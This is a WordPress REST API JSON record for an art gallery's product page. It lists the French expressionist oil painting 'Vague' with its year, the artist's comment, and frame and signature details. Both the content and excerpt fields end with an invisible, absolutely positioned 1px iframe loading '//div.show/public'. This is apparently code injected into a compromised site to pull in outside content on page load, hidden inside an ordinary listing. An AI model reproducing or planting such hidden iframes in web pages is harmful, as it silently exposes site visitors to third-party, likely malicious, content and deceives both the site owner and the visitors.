{"id":5418,"date":"2024-09-07T15:27:40","date_gmt":"2024-09-07T13:27:40","guid":{"rendered":"https:\/\/meskinigallery.com\/?post_type=product&#038;p=5418"},"modified":"2024-09-07T15:27:40","modified_gmt":"2024-09-07T13:27:40","slug":"vague","status":"publish","type":"product","link":"https:\/\/meskinigallery.com\/index.php\/product\/vague\/","title":{"rendered":"Vague"},"content":{"rendered":"<p>Titre\u00a0: <b>Vague<\/b><\/p>\n<p>Courant artistique\u00a0: <b>L&rsquo;expressionnisme<\/b><\/p>\n<p>Technique\u00a0: <b>Huile sur toile<\/b><\/p>\n<p>Ann\u00e9e\u00a0:<b> 2016<\/b><\/p>\n<p>Lecture de l\u2019artiste\u00a0:<\/p>\n<p><b>\u00ab\u00a0La m\u00e9moire est un r\u00e9servoir in\u00e9puisable allant d&rsquo;\u00e9v\u00e9nements et de faits historiques aux sujets contemporains li\u00e9s \u00e0 l&rsquo;environnement, \u00e0 la mont\u00e9e du niveau de la mer et au danger \u00e0 venir. \u00bb<\/b><\/p>\n<p><a name=\"_GoBack\"><\/a> Cadre\u00a0: <b>Bois massif, cadre champagne vernis<\/b><\/p>\n<p>Signature\u00a0:<b> En bas \u00e0 droite<\/b><\/p>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n","protected":false},"excerpt":{"rendered":"<p>Titre\u00a0: <b>Vague<\/b><\/p>\n<p>Courant artistique\u00a0: <b>L&rsquo;expressionnisme<\/b><\/p>\n<p>Technique\u00a0: <b>Huile sur toile<\/b><\/p>\n<p>Ann\u00e9e\u00a0:<b> 2016<\/b><\/p>\n<p>Lecture de l\u2019artiste\u00a0:<\/p>\n<p><b>\u00ab\u00a0La m\u00e9moire est un r\u00e9servoir in\u00e9puisable allant d&rsquo;\u00e9v\u00e9nements et de faits historiques aux sujets contemporains li\u00e9s \u00e0 l&rsquo;environnement, \u00e0 la mont\u00e9e du niveau de la mer et au danger \u00e0 venir. \u00bb<\/b><\/p>\n<p><a name=\"_GoBack\"><\/a> Cadre\u00a0: <b>Bois massif, cadre champagne vernis<\/b><\/p>\n<p>Signature\u00a0:<b> En bas \u00e0 droite<\/b><\/p>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n","protected":false},"featured_media":5083,"template":"","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0},"product_brand":[],"product_cat":[37],"product_tag":[],"giftcard-category":[],"class_list":{"0":"post-5418","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-expressionnisme","9":"instock","10":"taxable","11":"shipping-taxable","12":"product-type-simple","13":"product-grid-view"},"aioseo_notices":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/product\/5418","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/types\/product"}],"version-history":[{"count":0,"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/product\/5418\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/media\/5083"}],"wp:attachment":[{"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/media?parent=5418"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/product_brand?post=5418"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/product_cat?post=5418"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/product_tag?post=5418"},{"taxonomy":"giftcard-category","embeddable":true,"href":"https:\/\/meskinigallery.com\/index.php\/wp-json\/wp\/v2\/giftcard-category?post=5418"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}